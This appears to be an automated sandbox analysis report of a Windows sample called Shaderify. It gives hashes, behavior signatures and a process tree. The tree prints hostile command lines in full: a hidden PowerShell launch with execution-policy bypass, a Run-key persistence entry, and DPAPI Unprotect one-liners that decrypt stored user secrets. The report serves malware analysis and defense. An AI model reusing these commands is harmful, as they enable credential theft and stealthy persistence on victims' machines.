Overview (score 8)

Static task
- static, score 3

Behavioral tasks (sample, platform, score)
- Shaderify 8.4.4.exe, windows7-x64, score 8
- Shaderify 8.4.4.exe, windows10-2004-x64, score 8
- $PLUGINSDIR/StdUtils.dll, windows7-x64, score 3
- $PLUGINSDIR/StdUtils.dll, windows10-2004-x64, score 3
- $PLUGINSDIR/System.dll, windows7-x64, score 3
- $PLUGINSDIR/System.dll, windows10-2004-x64, score 3
- LICENSES.chromium.html, windows7-x64, score 1
- LICENSES.chromium.html, windows10-2004-x64, score 1
- Shaderify.exe, windows7-x64, score 8
- Shaderify.exe, windows10-2004-x64, score 8
- d3dcompiler_47.dll, windows10-2004-x64, score 1
- ffmpeg.dll, windows7-x64, score 1
- ffmpeg.dll, windows10-2004-x64, score 1
- libEGL.dll, windows7-x64, score 1
- libEGL.dll, windows10-2004-x64, score 1
- libGLESv2.dll, windows7-x64, score 1
- libGLESv2.dll, windows10-2004-x64, score 1
- resources/app.js, windows7-x64, score 3
- resources/app.js, windows10-2004-x64, score 3
- resources/elevate.exe, windows7-x64, score 1
- resources/elevate.exe, windows10-2004-x64, score 1
- swiftshader/libEGL.dll, windows7-x64, score 1
- swiftshader/libEGL.dll, windows10-2004-x64, score 1
- swiftshader/libGLESv2.dll, windows7-x64, score 1
- swiftshader/libGLESv2.dll, windows10-2004-x64, score 1
- vk_swiftshader.dll, windows7-x64, score 1
- vk_swiftshader.dll, windows10-2004-x64, score 1
- vulkan-1.dll, windows7-x64, score 1
- vulkan-1.dll, windows10-2004-x64, score 1
- $PLUGINSDIR/nsis7z.dll, windows7-x64, score 3
- $PLUGINSDIR/nsis7z.dll, windows10-2004-x64, score 3

Analysis
- max time kernel: 148s
- max time network: 159s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 03-06-2024 09:47
Static task
- static1

Behavioral tasks (task: sample, resource)
- behavioral1: Shaderify 8.4.4.exe, win7-20240508-en
- behavioral2: Shaderify 8.4.4.exe, win10v2004-20240508-en
- behavioral3: $PLUGINSDIR/StdUtils.dll, win7-20240221-en
- behavioral4: $PLUGINSDIR/StdUtils.dll, win10v2004-20240426-en
- behavioral5: $PLUGINSDIR/System.dll, win7-20240215-en
- behavioral6: $PLUGINSDIR/System.dll, win10v2004-20240426-en
- behavioral7: LICENSES.chromium.html, win7-20240221-en
- behavioral8: LICENSES.chromium.html, win10v2004-20240508-en
- behavioral9: Shaderify.exe, win7-20240221-en
- behavioral10: Shaderify.exe, win10v2004-20240508-en
- behavioral11: d3dcompiler_47.dll, win10v2004-20240426-en
- behavioral12: ffmpeg.dll, win7-20240419-en
- behavioral13: ffmpeg.dll, win10v2004-20240426-en
- behavioral14: libEGL.dll, win7-20240508-en
- behavioral15: libEGL.dll, win10v2004-20240508-en
- behavioral16: libGLESv2.dll, win7-20240221-en
- behavioral17: libGLESv2.dll, win10v2004-20240508-en
- behavioral18: resources/app.js, win7-20231129-en
- behavioral19: resources/app.js, win10v2004-20240426-en
- behavioral20: resources/elevate.exe, win7-20240221-en
- behavioral21: resources/elevate.exe, win10v2004-20240508-en
- behavioral22: swiftshader/libEGL.dll, win7-20240508-en
- behavioral23: swiftshader/libEGL.dll, win10v2004-20240426-en
- behavioral24: swiftshader/libGLESv2.dll, win7-20240508-en
- behavioral25: swiftshader/libGLESv2.dll, win10v2004-20240508-en
- behavioral26: vk_swiftshader.dll, win7-20240221-en
- behavioral27: vk_swiftshader.dll, win10v2004-20240508-en
- behavioral28: vulkan-1.dll, win7-20240221-en
- behavioral29: vulkan-1.dll, win10v2004-20240226-en
- behavioral30: $PLUGINSDIR/nsis7z.dll, win7-20240215-en
- behavioral31: $PLUGINSDIR/nsis7z.dll, win10v2004-20240508-en
General
- Target: Shaderify.exe
- Size: 120.4MB
- MD5: 2776d64baf7179ce926864738c2e8939
- SHA1: b55826db4d6ca723869256b97af48761950677a0
- SHA256: 287b3a16f8e654deb64eb2fd9039803de16a81d17f55a140814ce7dda7f56d96
- SHA512: b397926546ad482ab45a65cabb4668997ac0553786c98e8b1cc09cf4706378b8a8b53a30f27665ebbfc84bb66422c36b152a644be4438ba313714703d7cdc7b2
- SSDEEP: 1572864:o1f0+Sva7Hdp1Nhn+aCdrvdYrZ/7/lbg8udR8SnuSE49z:Nasulbg8yTnbEOz
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    Shaderify.exe: Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation

- Loads dropped DLL (1 IoC)
  Processes:
    Shaderify.exe (PID 4440)

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
    powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\VTOizUgHSvlseoy.ps1\""

- Looks up external IP address via web service (4 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, IoC):
    16: api.ipify.org
    17: api.ipify.org
    25: ipinfo.io
    26: ipinfo.io

- An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  Processes:
    cmd.exe (PID 2028)
    cmd.exe (PID 4224)

- Enumerates processes with tasklist (1 TTP, 1 IoC)

- Suspicious behavior: EnumeratesProcesses (12 IoCs)
  Processes (pid, process):
    4124 powershell.exe
    4124 powershell.exe
    1592 powershell.exe
    1592 powershell.exe
    3876 powershell.exe
    3876 powershell.exe
    1688 Shaderify.exe
    1688 Shaderify.exe
    5072 Shaderify.exe
    5072 Shaderify.exe
    5072 Shaderify.exe
    5072 Shaderify.exe

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege, 656, tasklist.exe
    Token: SeDebugPrivilege, 4124, powershell.exe
    Token: SeDebugPrivilege, 1592, powershell.exe
    Token: SeDebugPrivilege, 3876, powershell.exe

- Suspicious use of WriteProcessMemory (64 IoCs)
Processes

- C:\Users\Admin\AppData\Local\Temp\Shaderify.exe (PID 4440)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe"
  - Checks computer location settings
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  - C:\Windows\system32\cmd.exe (PID 2940)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4124)
      Command line: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
      - Command and Scripting Interpreter: PowerShell
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 4772)
        Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline"
        - Suspicious use of WriteProcessMemory

        - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 1924)
          Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp" "c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP"

  - C:\Windows\system32\cmd.exe (PID 2520)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    - Suspicious use of WriteProcessMemory

    - C:\Windows\system32\tasklist.exe (PID 656)
      Command line: tasklist
      - Enumerates processes with tasklist
      - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\cmd.exe (PID 2028)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')"
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1592)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  - C:\Windows\system32\cmd.exe (PID 4224)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')"
    - An obfuscated cmd.exe command-line is typically used to evade detection.
    - Suspicious use of WriteProcessMemory

    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3876)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

  - C:\Users\Admin\AppData\Local\Temp\Shaderify.exe (PID 3320)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2

  - C:\Users\Admin\AppData\Local\Temp\Shaderify.exe (PID 1688)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2184 /prefetch:8
    - Suspicious behavior: EnumeratesProcesses

  - C:\Users\Admin\AppData\Local\Temp\Shaderify.exe (PID 5072)
    Command line: "C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:2
    - Suspicious behavior: EnumeratesProcesses

- C:\Windows\System32\CompPkgSrv.exe (PID 1908)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
Downloads